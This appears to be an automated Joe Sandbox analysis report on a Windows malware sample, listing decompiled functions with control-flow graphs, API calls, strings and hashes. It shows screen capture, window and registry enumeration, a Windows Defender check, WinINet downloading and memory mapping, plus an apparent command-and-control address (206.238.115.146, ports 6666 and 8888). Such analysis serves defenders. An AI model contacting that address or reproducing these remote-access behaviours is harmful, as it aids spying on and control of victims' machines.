                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: Info$ByteCharMultiSystemWidewsprintf$CountCurrentTickWindow_errnoinet_ntoalstrlen$AddressDirectoryForegroundHandleInputLastLocaleModuleNativeProcProcessProfileText_invalid_parameter_noinfo_localtime64gethostbynamegethostnamemalloc
                          • String ID: %d min$1.0$2024. 6.19$AppEvents$GROUP$GetNativeSystemInfo$Network$REMARK$X64$X64 %s$kernel32.dll$x64$x86
                          • API String ID: 1661628823-2610823962
                          • Opcode ID: 0597a9a8bc57398b293fbe0f732a79aa948228ee52a9d6ae8b0ebe17f385299e
                          • Instruction ID: 309093f93e4ef286cd73267993ec77eae4492e053d3fd233417c329175dcd11e
                          • Opcode Fuzzy Hash: 0597a9a8bc57398b293fbe0f732a79aa948228ee52a9d6ae8b0ebe17f385299e
                          • Instruction Fuzzy Hash: 41F16C32240AC696FB18DF60E880BDD7773F794744F40412ADA4A57AA5DF38DB6AC740
                          Function 000001CFB96107A0 Relevance: 58.1, APIs: 23, Strings: 10, Instructions: 301sleepregistrysynchronizationCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 86 1cfb96107a0-1cfb9610804 call 1cfb9612fc4 Sleep 89 1cfb9610806-1cfb961082f call 1cfb9611ef8 call 1cfb96122d0 CloseHandle 86->89 90 1cfb9610835-1cfb961083c 86->90 89->90 91 1cfb9610843-1cfb96108d4 GetLocalTime wsprintfW SetUnhandledExceptionFilter call 1cfb96122d0 CloseHandle call 1cfb9611ef8 90->91 92 1cfb961083e call 1cfb9608be0 90->92 102 1cfb96108e3 91->102 103 1cfb96108d6-1cfb96108e1 call 1cfb9603220 91->103 92->91 105 1cfb96108e6-1cfb96108f8 call 1cfb9611ef8 102->105 103->105 109 1cfb9610907 105->109 110 1cfb96108fa-1cfb96108fd call 1cfb960b300 105->110 112 1cfb961090a-1cfb961090f 109->112 113 1cfb9610902-1cfb9610905 110->113 114 1cfb9610910-1cfb9610928 call 1cfb9603200 112->114 113->112 117 1cfb9610957-1cfb961097b call 1cfb96120c4 * 2 114->117 118 1cfb961092a-1cfb9610955 call 1cfb96120c4 * 2 114->118 127 1cfb9610982-1cfb96109aa 117->127 118->127 128 1cfb96109f6-1cfb9610a00 127->128 129 1cfb96109ac-1cfb96109ef call 1cfb9603200 call 1cfb96120c4 * 2 127->129 131 1cfb9610a02-1cfb9610a07 128->131 132 1cfb9610a0e-1cfb9610a27 128->132 129->128 131->132 134 1cfb9610a79-1cfb9610aa5 call 1cfb9612fc4 132->134 135 1cfb9610a29-1cfb9610a45 EnumWindows 132->135 146 1cfb9610ab7-1cfb9610b77 call 1cfb9612fc4 CreateEventA call 1cfb96120c4 RegOpenKeyExW 134->146 147 1cfb9610aa7-1cfb9610ab2 Sleep 134->147 135->134 139 1cfb9610a47 135->139 140 1cfb9610a50-1cfb9610a77 Sleep EnumWindows 139->140 140->134 140->140 153 1cfb9610b89 146->153 154 1cfb9610b79-1cfb9610b83 call 1cfb960ee20 146->154 147->114 155 1cfb9610b90-1cfb9610b9a 153->155 157 1cfb9610b88 154->157 158 1cfb9610c16-1cfb9610c24 call 1cfb96067b0 155->158 159 1cfb9610b9c-1cfb9610bdd Sleep RegOpenKeyExW 155->159 157->153 164 1cfb9610c29-1cfb9610c2c 158->164 160 1cfb9610bdf-1cfb9610c02 RegQueryValueExW 159->160 161 1cfb9610c08-1cfb9610c0d 159->161 160->161 161->155 163 1cfb9610c0f 161->163 163->158 165 1cfb9610c40-1cfb9610c47 164->165 166 1cfb9610c2e-1cfb9610c3b 164->166 167 1cfb9610c49-1cfb9610c68 call 1cfb96122d0 165->167 168 1cfb9610c6b-1cfb9610c6e 165->168 175 1cfb9610d12-1cfb9610d28 CloseHandle 166->175 167->168 169 1cfb9610c70-1cfb9610c77 168->169 173 1cfb9610c79-1cfb9610c89 Sleep 169->173 174 1cfb9610ccc-1cfb9610ce0 169->174 173->169 176 1cfb9610c8b-1cfb9610c92 173->176 179 1cfb9610ce2-1cfb9610cf1 WaitForSingleObject CloseHandle 174->179 180 1cfb9610cf7-1cfb9610d11 call 1cfb9612fc4 Sleep 174->180 175->114 176->174 177 1cfb9610c94-1cfb9610ca7 176->177 184 1cfb9610ca9-1cfb9610cb8 WaitForSingleObject CloseHandle 177->184 185 1cfb9610cbe-1cfb9610cca Sleep 177->185 179->180 180->175 184->185 185->175
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: Sleep$CloseHandle$_errno$CreateEnumObjectOpenSingleWaitWindows_invalid_parameter_noinfo$ErrorEventExceptionFilterLastLocalQueryThreadTimeUnhandledValue_getptdfreemallocwsprintf
                          • String ID: %4d.%2d.%2d-%2d:%2d:%2d$127.0.0.1$206.238.115.146$206.238.115.146$206.238.115.146$6666$8888$Console$Console\1$IpDatespecial
                          • API String ID: 3428909306-2523648427
                          • Opcode ID: e7f111ba5dc29d1d22144977cf958d959f161eb9f5cb80e62a8ccba1b0c60566
                          • Instruction ID: 4db1bbfdc96b82c0f8ac123ee19958495282036af8265f6dfec0f1a650894106
                          • Opcode Fuzzy Hash: e7f111ba5dc29d1d22144977cf958d959f161eb9f5cb80e62a8ccba1b0c60566
                          • Instruction Fuzzy Hash: E5F15831688AD286FB149F25E880BD977B3F795784F40513EDA4A436A5DF38CE4ACB00
                          Function 000001CFB960DD20 Relevance: 49.3, APIs: 25, Strings: 3, Instructions: 302windowCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 186 1cfb960dd20-1cfb960ddca GetDesktopWindow GetDC CreateCompatibleDC GetDC GetDeviceCaps * 2 ReleaseDC 187 1cfb960ddd9-1cfb960ddf2 GetSystemMetrics 186->187 188 1cfb960ddcc-1cfb960ddd4 186->188 190 1cfb960de42-1cfb960de5d GetSystemMetrics 187->190 191 1cfb960ddf4-1cfb960de40 GetSystemMetrics 187->191 189 1cfb960de62-1cfb960e051 GetSystemMetrics * 2 CreateCompatibleBitmap SelectObject SetStretchBltMode GetSystemMetrics * 2 StretchBlt call 1cfb9611878 call 1cfb9615b40 GetDIBits call 1cfb9611878 call 1cfb9615b40 call 1cfb96118d0 call 1cfb9611ef8 188->189 204 1cfb960e053-1cfb960e066 189->204 205 1cfb960e068 189->205 190->189 191->189 206 1cfb960e06a-1cfb960e077 call 1cfb960e1c0 204->206 205->206 208 1cfb960e07c-1cfb960e07e 206->208 209 1cfb960e080-1cfb960e0aa DeleteObject * 2 ReleaseDC call 1cfb96123c4 208->209 210 1cfb960e0ea-1cfb960e10e call 1cfb9611878 208->210 215 1cfb960e0b4-1cfb960e0b7 209->215 216 1cfb960e0ac-1cfb960e0af call 1cfb96123c4 209->216 217 1cfb960e110-1cfb960e113 210->217 218 1cfb960e115 210->218 221 1cfb960e0e3-1cfb960e0e5 215->221 222 1cfb960e0b9-1cfb960e0be 215->222 216->215 219 1cfb960e118-1cfb960e14d call 1cfb96118d0 DeleteObject * 2 ReleaseDC call 1cfb96123c4 217->219 218->219 234 1cfb960e14f-1cfb960e152 call 1cfb96123c4 219->234 235 1cfb960e157-1cfb960e15c 219->235 226 1cfb960e184-1cfb960e1b2 call 1cfb96118a0 221->226 224 1cfb960e0c0-1cfb960e0c3 call 1cfb9611880 222->224 225 1cfb960e0c8-1cfb960e0de call 1cfb9611880 222->225 224->225 225->221 234->235 237 1cfb960e166-1cfb960e181 call 1cfb9611880 235->237 238 1cfb960e15e-1cfb960e161 call 1cfb9611880 235->238 237->226 238->237
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: MetricsSystem$Object$Delete$Release$CapsCompatibleCreateDeviceStretch$BitmapBitsDesktopModeSelectWindowmalloc
                          • String ID: $gfff$gfff
                          • API String ID: 1524144516-4202476792
                          • Opcode ID: 9a10de1b3758c51586f0cda8e42a005b2d9936903bf318cf6b77adf13835b416
                          • Instruction ID: 2994d5536e0a6d89f695ccd8f09d9c4345fe604353f95f7b4c9a77764b569088
                          • Opcode Fuzzy Hash: 9a10de1b3758c51586f0cda8e42a005b2d9936903bf318cf6b77adf13835b416
                          • Instruction Fuzzy Hash: A3D1B032710B9186F715AB71E454B9D73B3FB59B88F01823ADE0A67798EF38C9568340
                          Function 000001CFB93973D0 Relevance: 32.9, APIs: 3, Strings: 15, Instructions: 1376registryCOMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112135711.000001CFB9391000.00000020.10000000.00040000.00000000.sdmp, Offset: 000001CFB9391000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9391000_2IVWAPeiZm.jbxd
                          Similarity
                          • API ID: OpenQueryValue_wcsrev
                          • String ID: 1$|$|$|$|$|$|$|$|$|$|$|$|$|$|
                          • API String ID: 2336627112-483243098
                          • Opcode ID: e7c24950faba3f9ac85f5f069f5f95afb0107786a1c82c81ace9b637109b25c1
                          • Instruction ID: b9ceb4c2870b1af13fd6217388f93164b9ffedb9a8898c40617e7ecb3b27d834
                          • Opcode Fuzzy Hash: e7c24950faba3f9ac85f5f069f5f95afb0107786a1c82c81ace9b637109b25c1
                          • Instruction Fuzzy Hash: 6F92F7306A49898AFB2D6F14D985BF973AAFB51305FAC853DC487C20E2DF74C9478681
                          Function 000001CFB9603380 Relevance: 28.2, APIs: 15, Strings: 1, Instructions: 168networkstringtimeCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: ByteCharMultiWidelstrlen$EventResetTimeconnectgethostbynamehtonssockettime
                          • String ID: 0u
                          • API String ID: 950253168-3203441087
                          • Opcode ID: 0b0d78ca37e5d5ffe8402b7fe09c2a3ec7c65584014e325bd1671e59c11e9872
                          • Instruction ID: 4022e190c70c03b14471ad94b9f9ef58bfbb305f64adb940e2047e5496de9b0e
                          • Opcode Fuzzy Hash: 0b0d78ca37e5d5ffe8402b7fe09c2a3ec7c65584014e325bd1671e59c11e9872
                          • Instruction Fuzzy Hash: 35812C72204BC187E760DF61F48079AB7B6F788B94F50412AEA8A57B64DF3CD5468B04
                          Function 000001CFB9607510 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 186stringregistrycomCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$CloseCreateProcess32$FirstHandleInstanceNextOpenQuerySnapshotToolhelp32Valuelstrlenwsprintf
                          • String ID: CLSID\{%.8X-%.4X-%.4X-%.2X%.2X-%.2X%.2X%.2X%.2X%.2X%.2X}$Windows Defender IOfficeAntiVirus implementation
                          • API String ID: 2719888535-1583895642
                          • Opcode ID: 5798e1544e650f95b40f9061c22e2bd83b7a927371cc76c98018ac4bb4a914d0
                          • Instruction ID: 620889b4c088d9526dbe7ffdda88db386f5dd7808f3903edf2e6aa99fbc7fdba
                          • Opcode Fuzzy Hash: 5798e1544e650f95b40f9061c22e2bd83b7a927371cc76c98018ac4bb4a914d0
                          • Instruction Fuzzy Hash: B2915D32700B9586FB14DF66E890BDD77B2F788B88F50512ADE4957A68DF38CA06C700
                          Function 000001CFB96188E0 Relevance: 21.3, APIs: 10, Strings: 2, Instructions: 292timeCOMMONLIBRARYCODE
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 835 1cfb96188e0-1cfb9618928 call 1cfb961b128 call 1cfb96196c4 call 1cfb961967c 842 1cfb9618d39-1cfb9618d4d call 1cfb9614b24 835->842 843 1cfb961892e-1cfb961893d call 1cfb961961c 835->843 848 1cfb9618d4e-1cfb9618d5d 842->848 849 1cfb9618943-1cfb9618952 call 1cfb961964c 843->849 850 1cfb9618d25-1cfb9618d34 call 1cfb9614b24 843->850 854 1cfb9618d11-1cfb9618d20 call 1cfb9614b24 849->854 855 1cfb9618958-1cfb961898f call 1cfb961d7f0 call 1cfb961d9e4 849->855 850->842 854->850 861 1cfb9618a26-1cfb9618a30 855->861 862 1cfb9618995-1cfb9618998 855->862 864 1cfb9618a32-1cfb9618a37 call 1cfb9611e00 861->864 865 1cfb9618a3e-1cfb9618a45 call 1cfb9626380 861->865 862->861 863 1cfb961899e-1cfb96189a8 862->863 868 1cfb96189aa-1cfb96189b7 call 1cfb96140d0 863->868 869 1cfb96189ce-1cfb96189e9 call 1cfb9614200 call 1cfb9616eec 863->869 864->865 872 1cfb9618a4b-1cfb9618a4e 865->872 876 1cfb9618b75 868->876 882 1cfb96189bd-1cfb96189c7 868->882 869->876 890 1cfb96189ef-1cfb9618a0c call 1cfb9614200 call 1cfb9614180 869->890 875 1cfb9618a54-1cfb9618a7c 872->875 872->876 880 1cfb9618a8c-1cfb9618a94 875->880 881 1cfb9618a7e-1cfb9618a85 875->881 878 1cfb9618b7a-1cfb9618bb0 call 1cfb96196bc call 1cfb96196ac call 1cfb96196b4 call 1cfb961b028 876->878 878->848 912 1cfb9618bb6-1cfb9618bce call 1cfb961cc24 878->912 886 1cfb9618a96-1cfb9618a9e 880->886 887 1cfb9618ab9-1cfb9618ac1 880->887 881->880 882->869 883 1cfb96189c9 call 1cfb9611e00 882->883 883->869 886->887 891 1cfb9618aa0-1cfb9618ab7 886->891 892 1cfb9618ac9-1cfb9618b03 WideCharToMultiByte 887->892 890->878 909 1cfb9618a12-1cfb9618a21 call 1cfb9614b24 890->909 891->892 895 1cfb9618b05-1cfb9618b0d 892->895 896 1cfb9618b19-1cfb9618b1d 892->896 895->896 899 1cfb9618b0f-1cfb9618b17 895->899 900 1cfb9618b20-1cfb9618b56 WideCharToMultiByte 896->900 899->900 901 1cfb9618b58-1cfb9618b60 900->901 902 1cfb9618b6d-1cfb9618b72 900->902 901->902 905 1cfb9618b62-1cfb9618b6b 901->905 902->876 905->876 909->861 915 1cfb9618bd4-1cfb9618bda 912->915 916 1cfb9618cfc-1cfb9618d10 call 1cfb9614b24 912->916 917 1cfb9618be3-1cfb9618bff call 1cfb961d9d8 915->917 918 1cfb9618bdc-1cfb9618be0 915->918 916->854 923 1cfb9618c02-1cfb9618c06 917->923 918->917 924 1cfb9618cf4-1cfb9618cf7 923->924 925 1cfb9618c0c-1cfb9618c0e 923->925 924->923 926 1cfb9618c10-1cfb9618c13 925->926 927 1cfb9618c19-1cfb9618c1c 925->927 926->924 926->927 928 1cfb9618c82-1cfb9618c85 927->928 929 1cfb9618c1e-1cfb9618c3f call 1cfb961d9d8 927->929 930 1cfb9618c92-1cfb9618c9e 928->930 931 1cfb9618c87-1cfb9618c8a 928->931 938 1cfb9618c49-1cfb9618c4d 929->938 933 1cfb9618ca0-1cfb9618cb7 call 1cfb961cc24 930->933 934 1cfb9618cce-1cfb9618cd3 930->934 931->930 936 1cfb9618cd6-1cfb9618cf2 call 1cfb96196bc call 1cfb96196ac 933->936 945 1cfb9618cb9-1cfb9618ccd call 1cfb9614b24 933->945 934->936 936->848 941 1cfb9618c4f-1cfb9618c52 938->941 942 1cfb9618c41-1cfb9618c44 938->942 941->928 943 1cfb9618c54-1cfb9618c72 call 1cfb961d9d8 941->943 942->941 946 1cfb9618c46 942->946 953 1cfb9618c7c-1cfb9618c80 943->953 945->934 946->938 953->928 954 1cfb9618c74-1cfb9618c77 953->954 954->928 955 1cfb9618c79 954->955 955->953
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: _errno$_get_daylight_invalid_parameter_noinfo$ByteCharMultiWidefree$ErrorFreeHeapInformationLastTimeZone___lc_codepage_func__wtomb_environ_amsg_exit_getptd_lock
                          • String ID: Eastern Standard Time$Eastern Summer Time
                          • API String ID: 2532449802-239921721
                          • Opcode ID: 85d2046c202578092d9edaa575532717112bf84546d8c53ba0c1048ebffc475c
                          • Instruction ID: 93fc491af668b608a0d8311810acec24284f88d6fe3da0fbf618f48145ec1890
                          • Opcode Fuzzy Hash: 85d2046c202578092d9edaa575532717112bf84546d8c53ba0c1048ebffc475c
                          • Instruction Fuzzy Hash: 4CC1C1722842E28AFB20DF25E451BDA77B7B784780F40613D9A89537A6DB38CE53C700
                          Function 00007FF6F6081300 Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 235networkfileCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 983 7ff6f6081300-7ff6f6081364 call 7ff6f6084890 InternetOpenW 986 7ff6f6081366-7ff6f608136b 983->986 987 7ff6f60813a0-7ff6f60813a2 983->987 989 7ff6f608136d 986->989 990 7ff6f6081370-7ff6f6081395 InternetOpenUrlW 986->990 988 7ff6f6081667-7ff6f6081691 call 7ff6f60838f0 987->988 989->990 991 7ff6f60813a7-7ff6f60813c2 call 7ff6f60846e4 990->991 992 7ff6f6081397-7ff6f608139a InternetCloseHandle 990->992 997 7ff6f60813c4-7ff6f60813ce 991->997 998 7ff6f60813d0-7ff6f60813d4 991->998 992->987 999 7ff6f60813d7-7ff6f60813e7 997->999 998->999 1000 7ff6f60813fd-7ff6f6081419 999->1000 1001 7ff6f60813e9-7ff6f60813f8 999->1001 1003 7ff6f6081692-7ff6f6081697 call 7ff6f60811b0 1000->1003 1004 7ff6f608141f-7ff6f6081427 1000->1004 1002 7ff6f6081504-7ff6f608154e call 7ff6f6082cf0 1001->1002 1017 7ff6f6081585-7ff6f60815b4 call 7ff6f6085198 1002->1017 1018 7ff6f6081550-7ff6f6081562 1002->1018 1014 7ff6f6081698-7ff6f608169f call 7ff6f6081110 1003->1014 1007 7ff6f608142d-7ff6f6081437 1004->1007 1008 7ff6f60814c6 1004->1008 1011 7ff6f6081439-7ff6f6081446 1007->1011 1012 7ff6f6081472-7ff6f6081485 1007->1012 1013 7ff6f60814cb-7ff6f60814e1 1008->1013 1019 7ff6f608144a-7ff6f6081458 call 7ff6f6083910 1011->1019 1015 7ff6f6081487-7ff6f6081494 1012->1015 1016 7ff6f6081496-7ff6f608149d 1012->1016 1020 7ff6f60814f6-7ff6f60814ff 1013->1020 1021 7ff6f60814e3-7ff6f60814f4 1013->1021 1015->1013 1023 7ff6f60814b5-7ff6f60814c4 call 7ff6f6083910 1016->1023 1024 7ff6f608149f-7ff6f60814a6 1016->1024 1040 7ff6f60815cc-7ff6f60815e2 InternetReadFile 1017->1040 1041 7ff6f60815b6-7ff6f60815c7 InternetCloseHandle * 2 1017->1041 1025 7ff6f6081564-7ff6f6081577 1018->1025 1026 7ff6f6081580 call 7ff6f608394c 1018->1026 1036 7ff6f608145a-7ff6f6081470 1019->1036 1037 7ff6f60814ae-7ff6f60814b4 call 7ff6f6085368 1019->1037 1020->1002 1021->1020 1021->1021 1023->1013 1024->1014 1031 7ff6f60814ac 1024->1031 1025->1026 1032 7ff6f6081579-7ff6f608157f call 7ff6f6085368 1025->1032 1026->1017 1031->1019 1032->1026 1036->1013 1037->1023 1042 7ff6f6081618-7ff6f608161d call 7ff6f6082c30 1040->1042 1043 7ff6f60815e4-7ff6f60815e9 1040->1043 1046 7ff6f608165a-7ff6f6081664 call 7ff6f60816a0 1041->1046 1052 7ff6f6081622-7ff6f6081625 1042->1052 1043->1042 1047 7ff6f60815eb-7ff6f6081616 call 7ff6f6085168 InternetReadFile 1043->1047 1046->988 1047->1042 1047->1043 1055 7ff6f6081627-7ff6f6081640 call 7ff6f6085200 1052->1055 1056 7ff6f6081646-7ff6f6081658 InternetCloseHandle * 2 1052->1056 1055->1056 1056->1046
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.4113640461.00007FF6F6081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF6F6080000, based on PE: true
                          • Associated: 00000000.00000002.4113613717.00007FF6F6080000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.4113640461.00007FF6F6089000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.4113640461.00007FF6F6362000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.4113640461.00007FF6F636B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.4113640461.00007FF6F679E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7ff6f6080000_2IVWAPeiZm.jbxd
                          Similarity
                          • API ID: Internet$CloseHandle$FileOpenRead$Concurrency::cancel_current_task
                          • String ID: WinINetDownloader
                          • API String ID: 767669915-3650426168
                          • Opcode ID: a8d219060c47295b2708c97b2f62da7ac2fca95a3641a265d16f4eb374730639
                          • Instruction ID: 2976dc32ada8f2da7c5b69d6dd56410cfd99f40c64c970b286ca83b0e808c37a
                          • Opcode Fuzzy Hash: a8d219060c47295b2708c97b2f62da7ac2fca95a3641a265d16f4eb374730639
                          • Instruction Fuzzy Hash: 84A1A232A1DB8286EB50CB35E54027963A8FF85B94F644531EAAD83BE4FE7ED445C700
                          Function 000001CFB9607BF0 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 102memoryCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocErrorFreeInformationLastProcessStringToken$AccountLookup
                          • String ID: NONE_MAPPED$Network
                          • API String ID: 1972796461-3150097737
                          • Opcode ID: e393c4395483ecdbf19e55be59f9c2ef9305885c7219f6ab52e586474c7cd7fe
                          • Instruction ID: 5881c90d5630bb7872d83a4f4832f8d016f0752e2986c6ac81128469fae75e55
                          • Opcode Fuzzy Hash: e393c4395483ecdbf19e55be59f9c2ef9305885c7219f6ab52e586474c7cd7fe
                          • Instruction Fuzzy Hash: AE417231244AC286FA149B11F884BEA73B3F795B85F44453ADA89477A5EF39DE0BC700
                          Function 000001CFB9608A70 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 82registrylibraryloaderCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: AddressLibraryProc$CloseFreeHandleInfoLoadModuleNativeOpenQuerySystemValue_vswprintf_s_l
                          • String ID: %d.%d.%d$ProductName$RtlGetNtVersionNumbers$SOFTWARE\Microsoft\Windows NT\CurrentVersion$ntdll.dll
                          • API String ID: 1477497710-3190923360
                          • Opcode ID: 4262950ad49c61d605c756f4cea3116342fb25d2c80c30ab984ddaf2da6b532a
                          • Instruction ID: 9e55308c119035b435057651a381e4d792f1f1431f957dbcbaff313671d04324
                          • Opcode Fuzzy Hash: 4262950ad49c61d605c756f4cea3116342fb25d2c80c30ab984ddaf2da6b532a
                          • Instruction Fuzzy Hash: D8319072255BC682FA60DB11F580BD97373F785B94F405229EE8A07B99DF38CA46CB00
                          Function 000001CFB96098C0 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 85stringCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1110 1cfb96098c0-1cfb96098e6 1111 1cfb96098ef-1cfb9609924 GetLogicalDriveStringsW 1110->1111 1112 1cfb96098e8-1cfb96098ea 1110->1112 1114 1cfb960992a-1cfb9609938 1111->1114 1115 1cfb96099dd-1cfb96099e3 lstrcpyW 1111->1115 1113 1cfb9609a0b-1cfb9609a25 call 1cfb96118a0 1112->1113 1114->1115 1117 1cfb960993e 1114->1117 1118 1cfb96099e9 1115->1118 1120 1cfb9609946-1cfb9609963 lstrcmpiW 1117->1120 1121 1cfb96099eb-1cfb9609a03 1118->1121 1122 1cfb9609965-1cfb9609977 lstrcmpiW 1120->1122 1123 1cfb96099cc-1cfb96099d7 1120->1123 1121->1113 1122->1123 1124 1cfb9609979-1cfb96099a8 QueryDosDeviceW 1122->1124 1123->1115 1123->1120 1124->1118 1125 1cfb96099aa-1cfb96099ca lstrlenW call 1cfb96127c0 1124->1125 1125->1123 1128 1cfb9609a26-1cfb9609a46 lstrcpyW lstrcatW 1125->1128 1128->1121
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcmpilstrcpy$DeviceDriveLogicalQueryStringslstrcatlstrlen
                          • String ID: A:\$B:\
                          • API String ID: 1889997506-1009255891
                          • Opcode ID: cc35f10c472c84fe476aa86446e84a2d1080405b0ff074f1aa1dec8f82191c6d
                          • Instruction ID: 982c70a56d374525f28710f3400dcd23d134bb49aca65c2ec803468ef3b6c57b
                          • Opcode Fuzzy Hash: cc35f10c472c84fe476aa86446e84a2d1080405b0ff074f1aa1dec8f82191c6d
                          • Instruction Fuzzy Hash: 6C414375244AC285FA709B11E880BDE7373F798B85F44502ADA8947799EF7CCA46CB00
                          Function 000001CFB9313495 Relevance: 16.8, APIs: 8, Strings: 1, Instructions: 1070memorynativeCOMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112008325.000001CFB9300000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9300000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9300000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: SectionVirtual$ProtectView$AllocCreateUnmap
                          • String ID: @
                          • API String ID: 1653215272-2766056989
                          • Opcode ID: 82f163e4761bd8698f5f866852cd4e0229762b1cc4392098708726b2277ebcfa
                          • Instruction ID: b58f64b13160cddbb21019682a8a77bd2f0eaff82a1fedc1a55df7850ab99d4b
                          • Opcode Fuzzy Hash: 82f163e4761bd8698f5f866852cd4e0229762b1cc4392098708726b2277ebcfa
